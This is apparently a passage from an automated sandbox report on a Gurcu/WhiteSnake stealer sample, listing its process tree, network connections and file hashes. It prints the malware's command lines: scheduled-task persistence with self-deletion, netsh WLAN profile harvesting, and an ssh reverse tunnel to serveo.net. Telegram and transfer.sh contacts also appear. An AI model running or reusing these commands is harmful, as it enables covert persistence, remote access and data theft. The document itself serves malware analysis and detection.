Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8661 serveo.net

C:\Windows\system32\taskeng.exe

taskeng.exe {14259D2D-B483-426D-98C8-CF75E3611BDE} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8661 serveo.net

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 140.82.112.4:443 github.com tcp
N/A 127.0.0.1:8661 tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.132:80 apps.identrust.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
DE 159.89.214.31:22 serveo.net tcp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:8661 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
DE 144.76.136.153:443 transfer.sh tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp

Files

memory/2576-0-0x0000000000210000-0x0000000000272000-memory.dmp

memory/2576-1-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

memory/2576-2-0x000000001B2E0000-0x000000001B360000-memory.dmp

memory/2576-5-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2616-9-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2616-10-0x0000000000CD0000-0x0000000000D32000-memory.dmp

memory/2616-11-0x0000000000470000-0x00000000004F0000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

memory/2616-126-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2616-127-0x0000000000470000-0x00000000004F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab9A10.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar9AAF.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9243b84ee0e68751cc2c365baa4c29bc
SHA1 73ea73b428ab02b5594a35a236301381807be227
SHA256 741e53325f380864f1a841243c74b01b2466cc307a02bddfdf8d447e161b5dce
SHA512 ef36b7578f1651d187304a1c002d0619c6704cb8498a6c1921301661e5591eeb04523f815325b2be5438ba46c7f683ecca77602e57bd6e0fce8f571a3f73129e

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2352-190-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2352-191-0x000000001B2A0000-0x000000001B320000-memory.dmp

C:\Users\Admin\AppData\Local\w3bgb431s6\port.dat

MD5 919d2356219c1fa0c0bd560246532c72
SHA1 264be81b3a6dee19eb8b68a894d7050d94edf1a6
SHA256 ba64fc14ebb32368ef763cc24dfbabfaa7b23a3538bc0b8d3f1a690f281238df
SHA512 2021c12151f7cfd37898f1fb398c6a1d12c1053e43641234fd42319d83b27a079aa376c7d8ae20a9bd8eed608c2216157502abd5fde6a2257c1c5b1f8b73c22c

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\.ssh\known_hosts

MD5 18015a60cd12f33648facec1263cfafa
SHA1 31b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA256 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512 fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 856e50bb01e48a10d2611fefcdbb6970
SHA1 0687754123604c49fd05d04a0088c785bf480fae
SHA256 4f581d760957eb1473f471fdfa12247fdcb0efd058df6dba78c42df1f1b56253
SHA512 d4298076759621744abc2b7990855b05df11a70b0a864c4fc44bacbf5b68b0979db0123ffad27e59b84ceebbee89fde21a717b169eb82392ca68e46b2e968072

memory/2352-214-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2352-215-0x000000001B2A0000-0x000000001B320000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-08 08:16

Reported

2023-09-08 08:18

Platform

win10v2004-20230831-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2564 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\cmd.exe
PID 2564 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\cmd.exe
PID 2992 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2992 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2992 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2992 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2992 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2992 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2992 wrote to memory of 2520 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2992 wrote to memory of 2520 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2520 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\SYSTEM32\cmd.exe
PID 2520 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\SYSTEM32\cmd.exe
PID 1148 wrote to memory of 2784 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 1148 wrote to memory of 2784 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 1148 wrote to memory of 532 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 1148 wrote to memory of 532 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 1148 wrote to memory of 1232 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 1148 wrote to memory of 1232 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2520 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2520 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2520 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\SYSTEM32\cmd.exe
PID 2520 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 976 wrote to memory of 3728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 976 wrote to memory of 3812 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 976 wrote to memory of 3812 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 976 wrote to memory of 1808 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 976 wrote to memory of 1808 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3716 serveo.net

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

Network

Country Destination Domain Proto
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
N/A 127.0.0.1:3716 tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 232.200.77.51.in-addr.arpa udp
US 8.8.8.8:53 11.78.23.94.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
